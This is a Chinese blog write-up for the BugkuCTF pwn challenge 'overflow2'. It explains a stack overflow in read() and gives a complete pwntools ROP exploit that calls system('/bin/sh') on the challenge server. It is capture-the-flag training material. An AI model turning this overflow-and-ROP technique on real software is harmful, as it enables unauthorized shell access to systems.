BugkuCTF-PWN题pwn5-overflow2超详细讲解

最新推荐文章于 2024-04-14 16:08:24 发布
最新推荐文章于 2024-04-14 16:08:24 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: # BugkuCTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/am_03/article/details/120008297
版权

知识点

setvbuf:
setvbuf函数的功能:
如果你的内存足够大,可以把文件IO的BUF设置大一些,这样每次你用
fopen/fread/fwrite/fscanf/fprintf语句的时候,都会在内存里操作,减少内存到磁盘IO读写的操作次数,提高系统效率。
如果你的程序的功能涉及到类似数据库、视频、音频、图像处理等大量需要爆发式磁盘到内存的IO情况下,可以考虑setvbuf进行优化内存IO。
功 能: 把缓区与流相关

解题流程

查看保护机制
在这里插入图片描述
发现开启了RELRO,NX
只能通过ROP绕过

IDA打开,查看伪码:
在这里插入图片描述
0x20=32
0x100=256
read()函数存在栈溢出,查看栈结构
在这里插入图片描述

构造rop链

在这里插入图片描述
system函数的地址是0x401050
在这里插入图片描述
在这里插入图片描述

exp

from pwn import *
#sh = process('./pwn')
sh = remote('114.67.246.176',12246)

sh.recvuntil('Please Input your name')

pop_rdi_ret = 0x40126b
system_addr = 0x401050
binsh_addr = 0x402004

payload = b'a' * 32 + p64(1) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.send(payload)
sh.interactive()
彬彬有礼am_03
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-PWNpwn2-overflow详细讲解
am_03的博客
08-30 2007
思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
ctf库ctf-pwn收集
03-31
ctf库 CTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
BugkuCTF pwn overflow2
ChaoYue_miku的博客
07-04 1338
** 0、尝试打开文件,使用checksec检查保护情况 ** ** 1、使用IDA 64 Pro打开文件 ** read()函数存在栈溢出,查看栈结构 ** 2、构造rop链 ** Shitf+F12查找字符串 发现/bin/sh的地址是0x402004 system函数的地址是0x401050 64位程序的第一个参数在 rdi 寄存器里 使用ROPgadget工具寻找汇编指令 rdi寄存器地址:0x40126b ** 3、构造exp ** from pwn import * r = remo
BugkuCTFoverflow2[WriteUP]
最新发布
如有错误感谢斧正
04-14 297
我们需要构造payload使buf数组溢出,然后接上这里的total总的合成地址即可实现shell交互。总共需要填充28个字节,后面溢出可以填充为成0x20+0x8,或者直接写成0x28。总链:total = 0x40126b + 0x402004 + 0x401050。存在/bin/sh意味着我们可以利用这个字符串启动shell,双击查看地址。先看到_system函数,此函数可以直接返回一个由实参当作命令的消息。再查看下方的地址信息,获取到该函数十六进制地址为:0x401050。查看一下flag文件。
BugkuCTF pwn overflow
ChaoYue_miku的博客
07-02 1646
** 0、在Linux中打开文件,使用file命令查看文件类型,使用checksec检查保护情况 ** 64位文件,未开启任何保护,尝试运行一下 ** 1、使用IDA 64 Pro打开文件 ** 查看主函数 存在栈溢出漏洞 ** 2、寻找后门函数 ** 存在一个get_shell函数,地址为0x400751 ** 3、构造exp ** from pwn import * #io = process('./pwn2') io = remote("114.67.246.176", 15587)
overflow(2)
快乐小编的专栏
10-10 2566
9、内部浮动无影响 .clearFix{overflow: hidden; zoom: 1} .clear{zoom: 1} .clear:after{content: ''; display: table;clear: both} 10、overflow 的 两栏自适应布局 设置左边浮动,右边overflow .left { float: left; width:
CSS基础--overflow
chujinmaolu的博客
11-15 1694
1、依赖overflow的样式表现 有一种效果就离不开overflow:hidden声明,即单行文字溢出点点点效果。效果的核心是textoverflow:ellipsis。效果实现必需的3个声明如下: .ell { text-overflow: ellipsis; white-space: nowrap; overflow: hidden; } 目前,对-webkit-私有前缀支持良好的浏览器还可以实现多行文字打点效果,但是却无须依赖overflow:hidden。比方说,最多显示2行内容,
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 1333
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
0ctf-2017-pwn-char
02-05
2017年0ctf的pwn目质量还是非常高的,要求做人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1438
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
深入理解之overflow属性(第五期)
奔跑的面条博客
03-19 1万+
一、overflow特征 overflow-x:hidden;/ overflow-y:hidden;,当一方被隐藏的时候,另一方会自动变成visible; IE7浏览器下,文字越多的时候,按钮两侧的padding空白会越大。解决方法:给所有按钮添加overflow:visible; 二、overflow与滚动条 无论什么浏览器,默认滚动条来自于HTML,而不是body。 body/html...
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 418
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
CSS overflow 溢出
热门推荐
houyanhua1的专栏
10-30 12万+
new document div{ width:300px; height:200px; border:1px solid green; overflow:hidden;} /* overflow溢出,hidden隐藏,scroll滚动条,auto自动 */ 生活没有彩排,人生也没有彩排。 总会有些时候,满心期待换来的是失望,或者是
通过上溢出实现二进制的减法(笔记)
llllyh812的博客
07-14 765
笔记一.溢出二.二进制的减法实现 一.溢出 在数学的理论中,数字可以有无穷大,也可以有无穷小,但是现实中,计算机系统总会有一个 物理上的极限,因此不可能表示无穷大或者无穷小的数值.对于计算机,无论何种数据类型, 都有一个上限或者下限. Python3中数据长度是动态的,理论上支持无限大的数 可以通过sys.getsizeof()函数来查看某个数值占用多少字节. 一旦某个数值出了限定值,就会溢出:如果出上限,就叫上溢出(overflow);如果出下限, 就叫下溢出(underflow). 例:上溢出 n
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单目。这些目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取目提供的关键信息或获取系统控制权。 CTF 简单 PWN 目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 目,从初学者到专业选手都能找到适合自己水平的目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值